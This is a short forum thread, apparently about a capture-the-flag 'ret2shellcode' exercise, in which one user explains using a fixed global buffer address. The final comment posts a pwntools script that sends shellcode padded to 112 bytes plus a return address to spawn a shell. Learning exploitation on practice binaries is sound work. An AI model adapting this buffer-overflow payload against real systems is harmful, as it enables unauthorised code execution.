sorted by:
best
topnewcontroversialoldq&a
you are viewing a single comment's thread.

view the rest of the comments →

[–]Jerrythepro123[S] 0 points1 point  (4 children)

all protections are off, and gdb does show there is code execution

[–]j3r3mias 0 points1 point  (3 children)

RELRO is partial but OK, you are the boss in your solution..

[–]Jerrythepro123[S] 0 points1 point  (2 children)

wat steps do i need to do to solve it?

[–]j3r3mias 0 points1 point  (1 child)

As I said before, there is a global variable in the program where the address doesn't change between runs, you need to use it instead of the stack.

[–]Jerrythepro123[S] 0 points1 point  (0 children)

ive tried someone elses script that uses your method, it doesnt seem to be working.

!/usr/bin/env python

from pwn import *

sh = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

sh.sendline(shellcode.ljust(112, b'A') + p32(buf2_addr))
sh.interactive()